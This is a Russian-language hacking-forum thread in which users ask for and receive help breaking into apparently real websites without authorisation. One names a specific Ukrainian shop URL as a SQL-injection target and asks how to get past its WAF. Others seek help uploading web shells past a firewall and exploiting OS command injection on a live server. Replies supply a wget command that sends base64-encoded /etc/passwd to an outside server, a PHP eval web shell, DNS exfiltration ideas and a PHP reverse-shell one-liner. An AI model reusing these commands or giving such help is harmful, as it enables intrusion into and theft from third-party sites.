Ваши вопросы по уязвимостям.

Discussion in 'Уязвимости' started by +, 27 Apr 2015.

  1. BabaDook

    BabaDook Well-Known Member

    Joined:
    9 May 2015
    Messages:
    1,063
    Likes Received:
    1,559
    Reputations:
    40
    %23
     
    Gorev and exT1ma4ka like this.
  2. exT1ma4ka

    exT1ma4ka New Member

    Joined:
    12 May 2010
    Messages:
    47
    Likes Received:
    2
    Reputations:
    5
    а бревна и не заметил.. smh o_O
     
    BabaDook likes this.
  3. Тот_самый_Щуп

    Тот_самый_Щуп Reservists Of Antichat

    Joined:
    23 Mar 2017
    Messages:
    265
    Likes Received:
    174
    Reputations:
    119
    Делай так: SELECT id FROM `#__users` LIMIT 0,1
     
  4. exT1ma4ka

    exT1ma4ka New Member

    Joined:
    12 May 2010
    Messages:
    47
    Likes Received:
    2
    Reputations:
    5
    @Gorbachev там кавычки запрещены. но товарищ @BabaDook верно напомнил, проблемы нет более.
     
  5. Octavian

    Octavian Elder - Старейшина

    Joined:
    8 Jul 2015
    Messages:
    506
    Likes Received:
    101
    Reputations:
    25
    Есть CRLF хочу выполнить XSS но и за ответа 302 ничего не выходит, что делать?
     
  6. Jimio

    Jimio New Member

    Joined:
    20 Dec 2018
    Messages:
    27
    Likes Received:
    0
    Reputations:
    0
    Лью шелл, когда заходишь на него, вводишь пасс, и получаешь пустую страницу или 503 код
    WAF? Как можно обойти?
     
  7. Тот_самый_Щуп

    Тот_самый_Щуп Reservists Of Antichat

    Joined:
    23 Mar 2017
    Messages:
    265
    Likes Received:
    174
    Reputations:
    119
    Частенько такие траблы из за упаковки шелла, пробуйте другие шеллы, античат одобряе :)
     
  8. crlf

    crlf Green member

    Joined:
    18 Mar 2016
    Messages:
    683
    Likes Received:
    1,513
    Reputations:
    460
    Действовать нужно в зависимости от места внедрения. Если выше стоит легитимный Location, то известных способов в паблике нет. Бывают различные контексты и в зависимости от бекенда попадаются варианты с возможностью обхода, но нужно ресёчить. Как вариант, если ещё не видел, ознакомиться с этим райтапом https://habr.com/ru/company/pt/blog/247709/.

    Похоже на проблему WSO2 с PHP7, нужно выпилить set_magic_quotes_runtime.
     
    #2588 crlf, 2 Apr 2019
    Last edited: 2 Apr 2019
    erwerr2321, Octavian and BillyBons like this.
  9. kacergei

    kacergei Member

    Joined:
    26 May 2007
    Messages:
    294
    Likes Received:
    89
    Reputations:
    1
    Можете пожалуйста подсказать по данной sql-injection:
    Code:
    igum.com.ua/index.php?route=product/search_auto&tab=all_tire&height=5&diameter=6&season=%D0%B2%D1%81%D0%B5%D1%81%D0%B5%D0%B7%D0%BE%D0%BD%D0%BD%D0%B0%D1%8F&type=%D0%B2%D0%BD%D0%B5%D0%B4%D0%BE%D1%80%D0%BE%D0%B6%D0%BD%D0%B8%D0%BA&brand=68&autotype=all&width=1
    Параметр: width
    Через sqlmap не удалось что с тамперами, что без
    Пробовал в ручную, но так и не сообразил как обойти и что конкретно фильтруется
    обратил внимание что фильтрует AND, OR и что то еще =( хотя могу ошибаться

    Может кто-то уже сталкивался с WAF'ом данного хостера( hostsila
    А то уже третий хост попадается этот и как в стену((
     
  10. Jimio

    Jimio New Member

    Joined:
    20 Dec 2018
    Messages:
    27
    Likes Received:
    0
    Reputations:
    0
    Запаковал нормально и все заработало. Спасибо.
     
  11. auth_root

    auth_root Member

    Joined:
    31 Jan 2010
    Messages:
    17
    Likes Received:
    10
    Reputations:
    0
    Есть os command inj в пост запросе, выводит uname -a : "Linux web***.******.com 2.6.32-696.16.1.el6.x86_64 #1 SMP Wed Nov 15 16:51:15 UTC 2017 x86_64 x86_64 x86_64 GNU/Linux""
    pwd выводит норм полный путь.
    ls -la выводит только первый файл "-rw-r--r--. 1 try_home try_home 25 2018-11-11 12:27 index.php" хотя файлов в дире много.
    И так из любой папки, только один показывает.
    wget и curl ничего не качают, хотя они установлены и работают (м.б. нет прав у меня?) файлы создавать не могу, читать не могу...
    cat "filename" показывает только последнюю строчку файла, "?>", если я пытаюсь с флагом -b, то показывает кол-во строк в файле и все. =(
    cat /etc/passwd -> "oprofile:x:16:16:Special user account to be used by OProfile:/home/oprofile:/sbin/nologin" Тоже блин одна строка.
    whoami говорит что я daemon (= Чего делать то?
    Никакие файлы ни прочитать полностью, ни отредактировать не могу. echo >> тоже не работает.
    Нету скилла.
    Прошу помощи, куда копнуть.
    Премного благодарен.
     
  12. BillyBons

    BillyBons Active Member

    Joined:
    1 Dec 2016
    Messages:
    221
    Likes Received:
    119
    Reputations:
    13
    Конвейер | работает ? С ним можно и списки файлов, и содержимое построчно перебрать.
     
    auth_root likes this.
  13. auth_root

    auth_root Member

    Joined:
    31 Jan 2010
    Messages:
    17
    Likes Received:
    10
    Reputations:
    0
    Покажи на примере плз, как. %7c работает.
     
  14. BillyBons

    BillyBons Active Member

    Joined:
    1 Dec 2016
    Messages:
    221
    Likes Received:
    119
    Reputations:
    13
    ls -l | awk 'NR==12' - показать двенадцатую строку из выдачи
     
    auth_root likes this.
  15. l1ght

    l1ght Elder - Старейшина

    Joined:
    5 Dec 2006
    Messages:
    191
    Likes Received:
    678
    Reputations:
    333
    auth_root, длина строки ответа различается, можешь попробовать
    cat index.php | base64
    или перенаправить вывод на свой сервер
    wget "http://hek.ru/?log={`cat /etc/passwd | base64`}"
    но, логичный вопрос, что мешает тебе запилить бекконект и сидеть в полноценном баше ;)
     
    auth_root and erwerr2321 like this.
  16. auth_root

    auth_root Member

    Joined:
    31 Jan 2010
    Messages:
    17
    Likes Received:
    10
    Reputations:
    0
    Да, так работает, спасибо. =) Чуствую спалят раньше, чем я переберу эту огромную массу информации построчно.
    wget (maybe в моих кривых руках) не работает. Base64 так же выводит всего по одной строке еще и обрезаной. Как запилить бэкконнект? Добавить <?php eval($_GET[cmd]); ?> в файл? Не редачит он существующие, пустые не создает, wget и curl не воркает у меня. Я Очень давно этим не занимался. Тут подбили края
     
  17. BabaDook

    BabaDook Well-Known Member

    Joined:
    9 May 2015
    Messages:
    1,063
    Likes Received:
    1,559
    Reputations:
    40
    Ты натолкнул на идею. через днс на свой сервак. dig то есть в линухе
     
  18. auth_root

    auth_root Member

    Joined:
    31 Jan 2010
    Messages:
    17
    Likes Received:
    10
    Reputations:
    0
    Как реализовать, покажите плз неумному =(
     
  19. hibar1Xs

    hibar1Xs Member

    Joined:
    30 Jan 2019
    Messages:
    15
    Likes Received:
    8
    Reputations:
    3
    Code:
    php -r '$sock=fsockopen("127.0.0.1",65536);exec("/bin/sh -i <&3 >&3 2>&3");'
     
  20. Тот_самый_Щуп

    Тот_самый_Щуп Reservists Of Antichat

    Joined:
    23 Mar 2017
    Messages:
    265
    Likes Received:
    174
    Reputations:
    119
    Ну вообще, там речь про системные команды, а не php RCE )